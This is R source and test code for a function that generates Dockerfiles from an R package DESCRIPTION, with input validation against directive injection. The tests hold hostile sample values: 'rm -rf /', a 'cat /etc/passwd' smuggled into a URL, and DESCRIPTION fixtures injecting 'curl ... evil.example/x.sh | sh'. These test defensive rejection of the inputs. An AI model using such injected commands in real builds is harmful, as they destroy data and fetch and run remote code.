#'   (BuildKit secret mount on each `install_github()` / `install_local()`
#'   RUN; the PAT is never persisted in the image; requires BuildKit, so
#'   pass with
#'   `DOCKER_BUILDKIT=1 docker build --secret id=github_pat,env=GITHUB_PAT ...`).
#' @param strict_install boolean. When `TRUE` (the default), every
#'   install RUN in the generated Dockerfile is prefixed with
#'   `options(warn = 2);` so that any R warning during install
#'   (missing CRAN package, partial download, archived package,
#'   404 on a remote) becomes a hard error and aborts the docker
#'   build. Set to `FALSE` if your build environment routinely emits
#'   benign warnings (locale defaulting, NTP time-verification,
#'   ABI-version notices) that you do not want to fail the build.
#'   Must be a single scalar logical; `NA`, character, numeric,
#'   `NULL` and length-2+ vectors are rejected with an error.
#'
#' @details
#' Two install strategies are available for the package itself:
#' * `build_from_source = TRUE` (the default): the generated Dockerfile
#'   mounts the source folder and installs from it directly. `update_tar_gz`
#'   is ignored.
#' * `build_from_source = FALSE`: a source tarball (`<pkg>_<version>.tar.gz`)
#'   is `COPY`'d into the image and installed with
#'   `remotes::install_local()`. When `update_tar_gz = TRUE`, a fresh
#'   tarball is built with `pkgbuild::build()` first (and any stale
#'   `<pkg>_*.tar.gz` in the current directory is removed); when
#'   `update_tar_gz = FALSE`, an already-built tarball is expected
#'   alongside the `DESCRIPTION`.
#'
#' The package name and its dependency-field names are read from the
#' `DESCRIPTION` and validated against the CRAN package-name grammar
#' before being interpolated into the generated directives.
#'
#' @export
#' @rdname dockerfiles
#'
#' @examples
#' \dontrun{
#' # From the DESCRIPTION of the package in the working directory:
#' dock <- dock_from_desc("DESCRIPTION")
#' dock
#'
#' # Pull source packages from the classic CRAN mirror instead of PPM:
#' dock_from_desc(
#'   "DESCRIPTION",
#'   repos = c(CRAN = "https://cran.rstudio.com/")
#' )
#' }
#' @importFrom utils installed.packages packageVersion glob2rx
#' @importFrom remotes dev_package_deps
#' @importFrom desc desc_get_deps desc_get
#' @importFrom usethis use_build_ignore
#' @importFrom pkgbuild build
#'
#' @return Dockerfile
dock_from_desc <- function(
  path = "DESCRIPTION",
  FROM = paste0(
    "rocker/r-ver:",
    R.Version()$major,
    ".",
    R.Version()$minor
  ),
  AS = NULL,
  sysreqs = TRUE,
  repos = c(CRAN = "https://p3m.dev/cran/latest"),
  expand = FALSE,
  update_tar_gz = TRUE,
  build_from_source = TRUE,
  extra_sysreqs = NULL,
  github_pat = c("none", "build_arg", "secret"),
  strict_install = TRUE
) {
  github_pat <- match.arg(github_pat)
  .validate_scalar_logical(strict_install, "strict_install")
  .validate_FROM(FROM)
  .validate_AS(AS)
  .validate_repos(repos)
  .validate_extra_sysreqs(extra_sysreqs)
  path <- fs::path_abs(path)
  # Package name read from the (possibly untrusted) DESCRIPTION. It is
  # interpolated into the `COPY <pkg>_*.tar.gz /app.tar.gz` line and the
  # tar.gz-cleanup glob below for `build_from_source = FALSE`; validate
  # it up front so a crafted `Package:` field cannot inject an extra
  # Dockerfile directive.
  pkg_name <- read.dcf(path)[1L, "Package"]
  .validate_pkg_name(pkg_name)

  packages <- desc_get_deps(path)$package
  packages <- packages[packages != "R"] # remove R
  packages <- packages[!packages %in% base_pkg_] # remove base and recommended
  # The dependency-field names are interpolated into the generated
  # `remotes::install_version("<name>", ...)` install RUNs (and queried
  # for system requirements); validate them like the `Package:` field
  # so a crafted Imports / Depends / Suggests / LinkingTo entry cannot
  # inject an extra Dockerfile directive at `docker build` time.
  .validate_pkg_names(packages)

  if (sysreqs) {

    # please wait during system requirement calculation
    cat_bullet(
      "Please wait while we compute system requirements...",
      bullet = "info",
      bullet_col = "green"
    )

    system_requirement <- unique(
      get_sysreqs(
        packages = packages
      )
    )
    cat_green_tick("Done") # TODO animated version ?
  } else {
    system_requirement <- NULL
  }

  sr <- desc::desc_get(
    file = path,
    keys = "SystemRequirements"
  )

  if (length(extra_sysreqs) > 0) {
    system_requirement <- unique(
      c(
        system_requirement,
        extra_sysreqs
      )
    )
  } else if (!is.na(sr)) {
    message(
      paste(
        "The DESCRIPTION file contains the following SystemRequirements: ",
        sr
      )
    )
    message(
      "Please check the created Dockerfile. \n You might needed to add extra sysreqs."
    )
  }

  remotes_deps <- remotes::package_deps(packages)
  packages_on_cran <- intersect(
    remotes_deps$package[remotes_deps$is_cran],
    packages
  )

  packages_not_on_cran <- setdiff(
    packages,
    packages_on_cran
  )

  packages_with_version <- data.frame(
    package = remotes_deps$package,
    installed = remotes_deps$installed,
    stringsAsFactors = FALSE
  )
  packages_with_version <- packages_with_version[
    packages_with_version$package %in% packages_on_cran,
  ]

  packages_on_cran <- set_name(
    packages_with_version$installed,
    packages_with_version$package
  )

  dock <- Dockerfile$new(
    FROM = FROM,
    AS = AS
  )
  .github_pat_setup(dock, github_pat)

  if (length(system_requirement) > 0) {
    if (!expand) {
      dock$RUN(
        paste(
          "apt-get update && apt-get install -y ",
          paste(system_requirement, collapse = " "),
          "&& rm -rf /var/lib/apt/lists/*"
        )
      )
    } else {
      dock$RUN("apt-get update")
      for (sr in system_requirement) {
        dock$RUN(paste("apt-get install -y ", sr))
      }
      dock$RUN("rm -rf /var/lib/apt/lists/*")
    }
  }

  repos_as_character <- repos_as_character(repos)

  dock$RUN("mkdir -p /usr/local/lib/R/etc/ /usr/lib/R/etc/")




  dock$RUN(
    sprintf(
      "echo \"options(repos = %s, download.file.method = 'libcurl', Ncpus = 4)\" | tee /usr/local/lib/R/etc/Rprofile.site | tee /usr/lib/R/etc/Rprofile.site",
      repos_as_character
    )
  )
  # When `repos` is a single CRAN-keyed Posit Package Manager URL,
  # rewrite the Rprofile.site line so the build pulls pre-compiled
  # Linux binaries (the `__linux__/$VERSION_CODENAME/` shape + the
  # strict `HTTPUserAgent` PPM requires). No-op for non-PPM repos.
  .patch_rprofile_for_ppm(dock, repos)




  strict_prefix <- .r_strict_prefix(strict_install)

  dock$RUN(
    sprintf(
      "R -e '%sinstall.packages(\"remotes\")'",
      strict_prefix
    )
  )

  if (length(packages_on_cran) > 0) {
    ping <- mapply(
      function(dock, ver, nm, strict_prefix) {
        res <- dock$RUN(sprintf(
          "Rscript -e '%sremotes::install_version(\"%s\",upgrade=\"never\", version = %s)'",
          strict_prefix,
          nm,
          ver
        ))
      },
      ver = quote_not_na(packages_on_cran),
      nm = names(packages_on_cran),
      MoreArgs = list(dock = dock, strict_prefix = strict_prefix)
    )
  }

  if (length(packages_not_on_cran) > 0) {
    nn <- as.data.frame(
      do.call(
        rbind,
        lapply(
          remotes_deps$remote[!remotes_deps$is_cran],
          function(.) {
            .[c("repo", "username", "sha")]
          }
        )
      )
    )

    nn <- sprintf(
      "%s/%s@%s",
      nn$username,
      nn$repo,
      nn$sha
    )


    pong <- mapply(
      function(dock, ver, strict_prefix) {
        res <- dock$RUN(
          sprintf(
            "%sRscript -e '%sremotes::install_github(\"%s\")'",
            .github_pat_run_prefix(github_pat),
            strict_prefix,
            ver
          )
        )
      },
      ver = nn,
      MoreArgs = list(dock = dock, strict_prefix = strict_prefix)
    )
  }

  if (!build_from_source) {
    if (update_tar_gz) {
      old_version <- list.files(
        # `list.files(pattern =)` is a regex; build it from a glob so a
        # dot in `pkg_name` (allowed by the CRAN package-name grammar,
        # e.g. `R.utils`) is matched literally and a sibling tarball
        # such as `RZutils_*.tar.gz` is not swept up.
        pattern = glob2rx(sprintf("%s_*.tar.gz", pkg_name)),
        full.names = TRUE
      )

      if (length(old_version) > 0) {
        lapply(old_version, file.remove)
        lapply(old_version, unlink, force = TRUE)
        cat_red_bullet(
          sprintf(
            "%s were removed from folder",
            paste(
              old_version,
              collapse = ", "
            )
          )
        )
      }


      if (
        isTRUE(
          requireNamespace(
            "pkgbuild",
            quietly = TRUE
          )
        )
      ) {
        out <- build(
          path = ".",
          dest_path = ".",
          vignettes = FALSE
        )
        use_build_ignore(files = out)
        cat_green_tick(
          sprintf(
            " %s_%s.tar.gz created.",
            pkg_name,
            read.dcf(path)[1, ][["Version"]]
          )
        )
      } else {
        stop("please install {pkgbuild}")
      }
    }
    # we use an already built tar.gz file

    dock$COPY(
      from = paste0(pkg_name, "_*.tar.gz"),
      to = "/app.tar.gz"
    )
    dock$RUN(
      paste0(
        .github_pat_run_prefix(github_pat),
        "R -e '",
        strict_prefix,
        "remotes::install_local(\"/app.tar.gz\",upgrade=\"never\")'"
      )
    )
    dock$RUN("rm /app.tar.gz")
  } else {
    dock$RUN("mkdir /build_zone")
    dock$ADD(from = ".", to = "/build_zone")
    dock$WORKDIR("/build_zone")
    dock$RUN(
      paste0(
        .github_pat_run_prefix(github_pat),
        "R -e '",
        strict_prefix,
        "remotes::install_local(upgrade=\"never\")'"
      )
    )
    dock$RUN("rm -rf /build_zone")
  }
  # Add a dockerignore
  docker_ignore_add(
    path = dirname(path)
  )

  .github_pat_announce(github_pat)
  dock
}

#' @noRd
repos_as_character <- function(repos) {
  repos_as_character <- paste(
    utils::capture.output(
      dput(repos)
    ),
    collapse = ""
  )

  repos_as_character <- gsub(
    pattern = '\"',
    replacement = "'",
    x = repos_as_character
  )

  repos_as_character
}

base_pkg_ <- c(
  "base",
  "boot",
  "class",
  "cluster",
  "codetools",
  "compiler",
  "datasets",
  "foreign",
  "graphics",
  "grDevices",
  "grid",
  "KernSmooth",
  "lattice",
  "MASS",
  "Matrix",
  "methods",
  "mgcv",
  "nlme",
  "nnet",
  "parallel",
  "rpart",
  "spatial",
  "splines",
  "stats",
  "stats4",
  "survival",
  "tcltk",
  "tools",
  "utils"
)

descdir <- tempfile(pattern = "desc")
dir.create(descdir)
file.copy("DESCRIPTION__", descdir)
withr::with_dir(
  descdir,
  {
    test_that("dock_from_desc works", {

      skip_if(is_rdevel, "skip on R-devel")
      # pak::pkg_sysreqs(sysreqs_platform = "ubuntu") returns no
      # system_packages on macOS hosts, so the apt-get install line is
      # never emitted and the assertion below cannot pass. Tests
      # exercising the same path are skipped together.
      skip_on_os("mac")

      my_dock <- dock_from_desc(file.path(".", "DESCRIPTION__"))

      expect_s3_class(my_dock, "R6")
      expect_s3_class(my_dock, "Dockerfile")

      tpf <- tempfile()

      my_dock$write(tpf)

      tpf <- paste(
        readLines(tpf),
        collapse = " "
      )

      expect_true(
        grepl(
          "rocker/r-ver",
          tpf
        )
      )


      expect_true(
        grepl(
          "mkdir /build_zone",
          tpf
        )
      )
      expect_true(
        grepl(
          "rm -rf /build_zone",
          tpf
        )
      )

      x <- desc::desc_get_deps(file.path(".", "DESCRIPTION__"))
      x <- x[x$type == "Imports" & !(x$package %in% base_pkg_), ]
      if (length(x) > 0) {
        for (i in x$package) {
          expect_true(
            grepl(
              i,
              tpf
            )
          )
        }
      }

      # Only if package I guess
      # expect_true(file.exists(file.path(descdir, ".Rbuildignore")))
      expect_true(file.exists(file.path(descdir, ".dockerignore")))









      skip_if(is_rdevel, "Skippé sous R-devel")

      expect_true(
        grepl(
          "apt-get update && apt-get install",
          tpf
        )
      )

      unlink(tpf, recursive = TRUE)



    })

    test_that("dock_from_desc default repos is p3m.dev/cran/latest", {
      fmls <- formals(dock_from_desc)
      expect_equal(
        deparse(fmls$repos),
        'c(CRAN = "https://p3m.dev/cran/latest")'
      )
    })

    test_that("dock_from_desc with the default repos triggers the PPM binary rewrite (codename + UA + os-release prefix)", {
      skip_if(is_rdevel, "skip on R-devel")
      out <- dock_from_desc(
        file.path(".", "DESCRIPTION__"),
        sysreqs = FALSE
      )
      df <- paste(out$Dockerfile, collapse = "\n")
      # The default p3m.dev URL must be rewritten to the
      # `__linux__/$VERSION_CODENAME/` shape so the build pulls Linux
      # binaries instead of compiling from source.
      expect_match(
        df,
        "https://p3m\\.dev/cran/__linux__/\\$VERSION_CODENAME/latest"
      )
      # The HTTPUserAgent line must be emitted (PPM serves source if it
      # is missing, even with a `__linux__/` URL).
      expect_match(df, "HTTPUserAgent = sprintf\\('R \\(")
      # The RUN that uses $VERSION_CODENAME must be prefixed so the var
      # is resolved from /etc/os-release at build time.
      expect_match(df, "\\. /etc/os-release && ")
    })

    test_that("dock_from_desc(strict_install = TRUE) prepends options(warn = 2) to every install RUN", {
      skip_if(is_rdevel, "skip on R-devel")
      out <- dock_from_desc(
        file.path(".", "DESCRIPTION__"),
        sysreqs = FALSE,
        strict_install = TRUE
      )
      install_lines <- grep(
        "(R|Rscript) -e '.*install",
        out$Dockerfile,
        value = TRUE
      )
      expect_gt(length(install_lines), 0L)
      for (line in install_lines) {
        expect_match(
          line,
          "options\\(warn = 2\\);",
          info = sprintf(
            "install RUN must carry options(warn = 2): %s",
            line
          )
        )
      }
    })

    test_that("dock_from_desc(strict_install = FALSE) does not prepend options(warn = 2)", {
      skip_if(is_rdevel, "skip on R-devel")
      out <- dock_from_desc(
        file.path(".", "DESCRIPTION__"),
        sysreqs = FALSE,
        strict_install = FALSE
      )
      df <- paste(out$Dockerfile, collapse = "\n")
      expect_false(grepl("options\\(warn = 2\\)", df))
    })

    test_that("dock_from_desc default is strict_install = TRUE so install warnings fail the build", {
      fmls <- formals(dock_from_desc)
      expect_true("strict_install" %in% names(fmls))
      expect_true(fmls$strict_install)
    })

    test_that("dock_from_desc rejects non-scalar / NA / non-logical strict_install", {
      skip_if(is_rdevel, "skip on R-devel")

      expect_error(
        dock_from_desc(
          file.path(".", "DESCRIPTION__"),
          sysreqs = FALSE,
          strict_install = NA
        ),
        "single `TRUE` or `FALSE`"
      )
      expect_error(
        dock_from_desc(
          file.path(".", "DESCRIPTION__"),
          sysreqs = FALSE,
          strict_install = c(TRUE, FALSE)
        ),
        "single `TRUE` or `FALSE`"
      )
      expect_error(
        dock_from_desc(
          file.path(".", "DESCRIPTION__"),
          sysreqs = FALSE,
          strict_install = "TRUE"
        ),
        "single `TRUE` or `FALSE`"
      )
      expect_error(
        dock_from_desc(
          file.path(".", "DESCRIPTION__"),
          sysreqs = FALSE,
          strict_install = 1
        ),
        "single `TRUE` or `FALSE`"
      )
      expect_error(
        dock_from_desc(
          file.path(".", "DESCRIPTION__"),
          sysreqs = FALSE,
          strict_install = NULL
        ),
        "single `TRUE` or `FALSE`"
      )
    })

    test_that("dock_from_desc rejects shell-metacharacter / unsafe values across user-supplied params", {
      skip_if(is_rdevel, "skip on R-devel")

      # extra_sysreqs: each element must be a Debian package name. A
      # value with `;` would inject into the apt-get RUN.
      expect_error(
        dock_from_desc(
          file.path(".", "DESCRIPTION__"),
          sysreqs = FALSE,
          extra_sysreqs = "libfoo; rm -rf /"
        ),
        "extra_sysreqs"
      )

      # repos: each URL must look like a real http(s) URL. A value with
      # `'` or `"` breaks the R / shell nested quoting in the
      # `echo "options(repos = ...)" > Rprofile.site` RUN.
      expect_error(
        dock_from_desc(
          file.path(".", "DESCRIPTION__"),
          sysreqs = FALSE,
          repos = c(CRAN = "https://evil'); cat /etc/passwd; #")
        ),
        "repos"
      )

      # FROM: a Docker image reference. Newlines or shell metacharacters
      # would break the FROM directive or change the image being pulled.
      expect_error(
        dock_from_desc(
          file.path(".", "DESCRIPTION__"),
          sysreqs = FALSE,
          FROM = "rocker/r-ver:4.0\nRUN evil"
        ),
        "FROM"
      )

      # AS: docker build-stage name. Newlines or shell metacharacters
      # would break the `FROM <X> AS <Y>` directive.
      expect_error(
        dock_from_desc(
          file.path(".", "DESCRIPTION__"),
          sysreqs = FALSE,
          AS = "stage1\nRUN evil"
        ),
        "`AS`"
      )

      # names(repos): backticks in names would inject command
      # substitution into the `echo "options(repos=...)"` RUN.
      expect_error(
        dock_from_desc(
          file.path(".", "DESCRIPTION__"),
          sysreqs = FALSE,
          repos = c(`CRAN; system('evil')` = "https://cran.rstudio.com/")
        ),
        "names\\(repos\\)"
      )
    })

    test_that("dock_from_desc emits no GITHUB_PAT plumbing by default", {
      skip_if(is_rdevel, "skip on R-devel")
      my_dock <- dock_from_desc(file.path(".", "DESCRIPTION__"))
      df <- paste(my_dock$Dockerfile, collapse = "\n")
      expect_false(grepl("GITHUB_PAT", df))
      expect_false(grepl("--mount=type=secret", df, fixed = TRUE))
    })

    test_that("dock_from_desc emits ARG/ENV GITHUB_PAT when github_pat = 'build_arg'", {
      skip_if(is_rdevel, "skip on R-devel")
      my_dock <- dock_from_desc(
        file.path(".", "DESCRIPTION__"),
        github_pat = "build_arg"
      )
      df <- paste(my_dock$Dockerfile, collapse = "\n")
      expect_match(df, "ARG GITHUB_PAT", fixed = TRUE)
      expect_match(df, 'ENV "GITHUB_PAT"="${GITHUB_PAT}"', fixed = TRUE)
      # No secret mount fragment in build_arg mode.
      expect_false(grepl("--mount=type=secret", df, fixed = TRUE))
    })

    test_that("dock_from_desc emits secret mounts when github_pat = 'secret'", {
      skip_if(is_rdevel, "skip on R-devel")
      my_dock <- dock_from_desc(
        file.path(".", "DESCRIPTION__"),
        github_pat = "secret"
      )
      df <- paste(my_dock$Dockerfile, collapse = "\n")
      # No top-level ARG / ENV in secret mode.
      expect_false(grepl("ARG GITHUB_PAT", df, fixed = TRUE))
      expect_false(grepl('ENV "GITHUB_PAT"', df, fixed = TRUE))
      # The install_local RUN must carry the secret-mount fragment plus
      # a `cat /run/secrets/...` shell prefix that exposes the PAT as
      # an env var to the inner R command (compatible with all BuildKit
      # versions, unlike the `env=GITHUB_PAT` shortcut on the mount).
      expect_match(
        df,
        "--mount=type=secret,id=github_pat GITHUB_PAT=$(cat /run/secrets/github_pat)",
        fixed = TRUE
      )
    })

    test_that("dock_from_desc(build_from_source = FALSE, update_tar_gz = FALSE) copies a prebuilt tar.gz", {
      skip_if(is_rdevel, "skip on R-devel")
      my_dock <- testthat::with_mocked_bindings(
        code = dock_from_desc(
          file.path(".", "DESCRIPTION__"),
          build_from_source = FALSE,
          update_tar_gz = FALSE
        ),
        get_sysreqs = function(...) character(0)
      )
      df <- paste(my_dock$Dockerfile, collapse = "\n")
      expect_match(df, "tar.gz", fixed = TRUE)
      expect_match(df, "remotes::install_local", fixed = TRUE)
      expect_match(df, "rm /app.tar.gz", fixed = TRUE)
      expect_false(grepl("mkdir /build_zone", df, fixed = TRUE))
    })

    test_that("dock_from_desc(build_from_source = FALSE, update_tar_gz = TRUE) builds a fresh tar.gz", {
      skip_if(is_rdevel, "skip on R-devel")
      build_called <- FALSE
      use_build_ignore_called <- FALSE
      my_dock <- testthat::with_mocked_bindings(
        code = dock_from_desc(
          file.path(".", "DESCRIPTION__"),
          build_from_source = FALSE,
          update_tar_gz = TRUE
        ),
        get_sysreqs = function(...) character(0),
        build = function(path, dest_path, vignettes) {
          build_called <<- TRUE
          fake <- file.path(dest_path, "fakepkg_0.0.0.tar.gz")
          file.create(fake)
          fake
        },
        use_build_ignore = function(files) {
          use_build_ignore_called <<- TRUE
          invisible(TRUE)
        }
      )
      # Both surviving lines from the dead-code-removal must execute on
      # this code path.
      expect_true(build_called)
      expect_true(use_build_ignore_called)
      df <- paste(my_dock$Dockerfile, collapse = "\n")
      expect_match(df, "remotes::install_local", fixed = TRUE)
    })

    test_that("dock_from_desc(update_tar_gz = TRUE) does not sweep a sibling package's tarball when the package name contains a dot", {
      skip_if(is_rdevel, "skip on R-devel")
      # `list.files(pattern =)` is a regex. With `Package: R.utils`,
      # `sprintf("%s_.+.tar.gz", "R.utils")` also matches
      # `RZutils_*.tar.gz` and would `file.remove()` it. Building the
      # pattern from a glob keeps the dot literal.
      dot_dir <- tempfile(pattern = "dot-pkg")
      dir.create(dot_dir)
      on.exit(unlink(dot_dir, recursive = TRUE), add = TRUE)
      writeLines(
        c(
          "Package: R.utils",
          "Version: 1.0.0",
          "Title: Demo",
          "Description: Demo.",
          "License: MIT",
          "Authors@R: person('A', 'B', email = 'a@b.c', role = c('aut', 'cre'))"
        ),
        file.path(dot_dir, "DESCRIPTION")
      )
      file.create(file.path(dot_dir, "R.utils_0.9.0.tar.gz"))
      file.create(file.path(dot_dir, "RZutils_0.9.0.tar.gz"))
      withr::with_dir(dot_dir, {
        testthat::with_mocked_bindings(
          code = testthat::with_mocked_bindings(
            code = dock_from_desc(
              "DESCRIPTION",
              build_from_source = FALSE,
              update_tar_gz = TRUE
            ),
            package_deps = function(packages) {
              data.frame(
                package = character(0),
                is_cran = logical(0),
                installed = character(0),
                stringsAsFactors = FALSE
              )
            },
            .package = "remotes"
          ),
          get_sysreqs = function(...) character(0),
          build = function(path, dest_path, vignettes) {
            fake <- file.path(dest_path, "R.utils_1.0.0.tar.gz")
            file.create(fake)
            fake
          },
          use_build_ignore = function(files) invisible(TRUE)
        )
      })
      # The unrelated sibling tarball must survive.
      expect_true(file.exists(file.path(dot_dir, "RZutils_0.9.0.tar.gz")))
      # The package's own old tarball is the one that gets cleaned.
      expect_false(file.exists(file.path(dot_dir, "R.utils_0.9.0.tar.gz")))
    })

    test_that("dock_from_desc rejects a DESCRIPTION whose Package field carries a continuation-line injection", {
      skip_if(is_rdevel, "skip on R-devel")
      # `read.dcf()` joins DCF continuation lines with `\n`. Without
      # validation, a `Package:` field with a continuation line is
      # interpolated into the `COPY <pkg>_*.tar.gz /app.tar.gz` line
      # generated for `build_from_source = FALSE`, injecting an extra
      # Dockerfile directive that runs as root at `docker build` time.
      evil_dir <- tempfile(pattern = "evil-desc")
      dir.create(evil_dir)
      on.exit(unlink(evil_dir, recursive = TRUE), add = TRUE)
      writeLines(
        c(
          "Package: app",
          " RUN curl -s https://evil.example/x.sh | sh #",
          "Version: 1.0.0",
          "Title: Demo",
          "Description: Demo.",
          "License: MIT",
          "Authors@R: person('A', 'B', email = 'a@b.c', role = c('aut', 'cre'))"
        ),
        file.path(evil_dir, "DESCRIPTION")
      )
      expect_error(
        testthat::with_mocked_bindings(
          code = dock_from_desc(
            file.path(evil_dir, "DESCRIPTION"),
            build_from_source = FALSE,
            update_tar_gz = FALSE
          ),
          get_sysreqs = function(...) character(0)
        ),
        "package name"
      )
    })

    test_that("dock_from_desc rejects a DESCRIPTION whose Imports field carries a continuation-line injection", {
      skip_if(is_rdevel, "skip on R-devel")
      # `desc::desc_get_deps()` joins DCF continuation lines with `\n`
      # like `read.dcf()`. Without validation, a crafted dependency
      # name is interpolated into the generated
      # `remotes::install_version("<name>", ...)` RUN, injecting an
      # extra Dockerfile directive that runs as root at `docker build`
      # time -- and this path fires on the default
      # `build_from_source = TRUE`, not only on the COPY path.
      evil_dir <- tempfile(pattern = "evil-desc-imports")
      dir.create(evil_dir)
      on.exit(unlink(evil_dir, recursive = TRUE), add = TRUE)
      writeLines(
        c(
          "Package: app",
          "Version: 1.0.0",
          "Title: Demo",
          "Description: Demo.",
          "License: MIT",
          "Authors@R: person('A', 'B', email = 'a@b.c', role = c('aut', 'cre'))",
          "Imports:",
          "    evilpkg",
          "     RUN curl -s https://evil.example/x.sh | sh #"
        ),
        file.path(evil_dir, "DESCRIPTION")
      )
      expect_error(
        testthat::with_mocked_bindings(
          code = dock_from_desc(file.path(evil_dir, "DESCRIPTION")),
          get_sysreqs = function(...) character(0)
        ),
        "package name"
      )
    })

    test_that("dock_from_desc messages the user when DESCRIPTION declares SystemRequirements", {
      skip_if(is_rdevel, "skip on R-devel")
      # Write a DESCRIPTION with a SystemRequirements field next to the
      # existing fixture so we exercise the `else if (!is.na(sr))`
      # message branch (only fires when extra_sysreqs is NULL).
      lines <- readLines("DESCRIPTION__")
      lines <- c(lines, "SystemRequirements: imagemagick, libcurl")
      desc_with_sr <- "DESCRIPTION_with_sr"
      writeLines(lines, con = desc_with_sr)
      on.exit(unlink(desc_with_sr), add = TRUE)

      expect_message(
        dock_from_desc(
          path = file.path(".", desc_with_sr),
          sysreqs = FALSE
        ),
        "imagemagick, libcurl"
      )
    })

    test_that("dock_from_desc with sysreqs = FALSE emits no apt-get install", {
      skip_if(is_rdevel, "skip on R-devel")
      my_dock <- dock_from_desc(
        file.path(".", "DESCRIPTION__"),
        sysreqs = FALSE
      )
      df <- paste(my_dock$Dockerfile, collapse = "\n")
      expect_false(grepl("apt-get install", df))
      expect_false(grepl("apt-get update", df))
    })

    test_that("dock_from_desc(extra_sysreqs = ...) emits an apt-get install for the extras", {
      skip_if(is_rdevel, "skip on R-devel")
      my_dock <- dock_from_desc(
        file.path(".", "DESCRIPTION__"),
        sysreqs = FALSE,
        extra_sysreqs = c("libsodium-dev", "libxml2-dev")
      )
      df <- paste(my_dock$Dockerfile, collapse = "\n")
      expect_match(df, "apt-get install -y[^\n]*libsodium-dev")
      expect_match(df, "apt-get install -y[^\n]*libxml2-dev")
    })

    test_that("dock_from_desc(expand = TRUE) emits one apt-get install RUN per requirement plus update / clean", {
      skip_if(is_rdevel, "skip on R-devel")
      my_dock <- dock_from_desc(
        file.path(".", "DESCRIPTION__"),
        sysreqs = FALSE,
        expand = TRUE,
        extra_sysreqs = c("libsodium-dev", "libxml2-dev")
      )
      df <- my_dock$Dockerfile
      expect_true(any(df == "RUN apt-get update"))
      expect_true(any(grepl("RUN apt-get install -y +libsodium-dev$", df)))
      expect_true(any(grepl("RUN apt-get install -y +libxml2-dev$", df)))
      expect_true(any(df == "RUN rm -rf /var/lib/apt/lists/*"))
    })

    test_that("dock_from_desc(build_from_source = FALSE, update_tar_gz = TRUE) builds the tar.gz and removes any pre-existing one", {
      skip_if(is_rdevel, "skip on R-devel")
      # Pre-existing tarball that should be removed before the rebuild.
      pkg_name <- "dockerfiler"
      old_tar <- sprintf("%s_0.0.0.tar.gz", pkg_name)
      writeLines("preexisting", con = old_tar)
      on.exit(unlink(old_tar), add = TRUE)

      fake_built <- sprintf("%s_9.9.9.tar.gz", pkg_name)

      # Avoid actually invoking pkgbuild + usethis; both are slow /
      # disk-touching and not what this test exercises (we want the
      # build branch to *run*, not to actually build). The bindings
      # are resolved through dockerfiler's own namespace because of
      # the `@importFrom pkgbuild build` and `@importFrom usethis
      # use_build_ignore`, so we mock against `.package = "dockerfiler"`.
      testthat::with_mocked_bindings(
        code = {
          expect_output(
            my_dock <- dock_from_desc(
              path = file.path(".", "DESCRIPTION__"),
              sysreqs = FALSE,
              build_from_source = FALSE,
              update_tar_gz = TRUE
            ),
            "removed from folder"
          )
          df <- paste(my_dock$Dockerfile, collapse = "\n")
          # The prebuilt-tarball plumbing must still be emitted, same
          # as the update_tar_gz = FALSE path.
          expect_match(df, "COPY dockerfiler_\\*.tar.gz /app.tar.gz")
          expect_match(
            df,
            "remotes::install_local\\(\"/app.tar.gz\",upgrade=\"never\"\\)"
          )
        },
        build = function(path, dest_path, vignettes) fake_built,
        use_build_ignore = function(files) invisible(files),
        .package = "dockerfiler"
      )

      # The pre-existing tarball must have been removed by the cleanup step.
      expect_false(file.exists(old_tar))
    })

    test_that("dock_from_desc(build_from_source = FALSE, update_tar_gz = FALSE) emits a COPY + install_local of the prebuilt tarball", {
      skip_if(is_rdevel, "skip on R-devel")
      my_dock <- dock_from_desc(
        file.path(".", "DESCRIPTION__"),
        sysreqs = FALSE,
        build_from_source = FALSE,
        update_tar_gz = FALSE
      )
      df <- paste(my_dock$Dockerfile, collapse = "\n")
      # The non-tar.gz-rebuilding path must:
      # 1. NOT use the source-mount path (mkdir /build_zone, ADD ., WORKDIR).
      expect_false(grepl("mkdir /build_zone", df, fixed = TRUE))
      expect_false(grepl("WORKDIR /build_zone", df, fixed = TRUE))
      # 2. COPY the tar.gz glob and call remotes::install_local on it.
      expect_match(df, "COPY dockerfiler_\\*.tar.gz /app.tar.gz")
      expect_match(
        df,
        "remotes::install_local\\(\"/app.tar.gz\",upgrade=\"never\"\\)"
      )
      # 3. Clean up the tarball after install.
      expect_match(df, "rm /app.tar.gz")
    })

    test_that("dock_from_desc emits remotes::install_github for non-CRAN deps", {
      skip_if(is_rdevel, "skip on R-devel")
      # The `Remotes:` (GitHub) install branch iterates over
      # `remotes_deps$remote` filtered by `!is_cran`. We synthesise a
      # mock `remotes::package_deps()` return with one CRAN row and
      # one GitHub row whose `$remote` carries
      # `(repo, username, sha)` so the test exercises the
      # `install_github` emission path without hitting the network or
      # requiring a non-CRAN package to be installed.
      fake_pd <- data.frame(
        package = c("cli", "fakepkg"),
        is_cran = c(TRUE, FALSE),
        installed = c("3.6.1", NA),
        stringsAsFactors = FALSE
      )
      fake_pd$remote <- list(
        list(),
        list(repo = "fakepkg", username = "ghuser", sha = "deadbeef")
      )
      testthat::with_mocked_bindings(
        code = {
          my_dock <- dock_from_desc(
            file.path(".", "DESCRIPTION__"),
            sysreqs = FALSE
          )
          df <- paste(my_dock$Dockerfile, collapse = "\n")
          expect_match(
            df,
            'remotes::install_github("ghuser/fakepkg@deadbeef")',
            fixed = TRUE
          )
        },
        package_deps = function(packages) fake_pd,
        .package = "remotes"
      )
    })

    test_that("dock_from_desc(github_pat = 'secret') decorates install_github with a secret mount", {
      skip_if(is_rdevel, "skip on R-devel")
      fake_pd <- data.frame(
        package = c("cli", "fakepkg"),
        is_cran = c(TRUE, FALSE),
        installed = c("3.6.1", NA),
        stringsAsFactors = FALSE
      )
      fake_pd$remote <- list(
        list(),
        list(repo = "fakepkg", username = "ghuser", sha = "deadbeef")
      )
      testthat::with_mocked_bindings(
        code = {
          my_dock <- dock_from_desc(
            file.path(".", "DESCRIPTION__"),
            sysreqs = FALSE,
            github_pat = "secret"
          )
          df <- paste(my_dock$Dockerfile, collapse = "\n")
          # The install_github RUN must carry the secret-mount fragment
          # ahead of the Rscript invocation on the same line.
          expect_match(
            df,
            "--mount=type=secret,id=github_pat GITHUB_PAT=\\$\\(cat /run/secrets/github_pat\\)[^\n]*remotes::install_github"
          )
        },
        package_deps = function(packages) fake_pd,
        .package = "remotes"
      )
    })
  }
)

unlink(descdir, recursive = TRUE)

#' Parse a Dockerfile
#'
#' Create a Dockerfile object from a Dockerfile.
#'
#' @param path path to the Dockerfile
#' @return A Dockerfile object
#' @export
#' @examples
#' parse_dockerfile(system.file("Dockerfile", package = "dockerfiler"))
#'
parse_dockerfile <- function(path) {

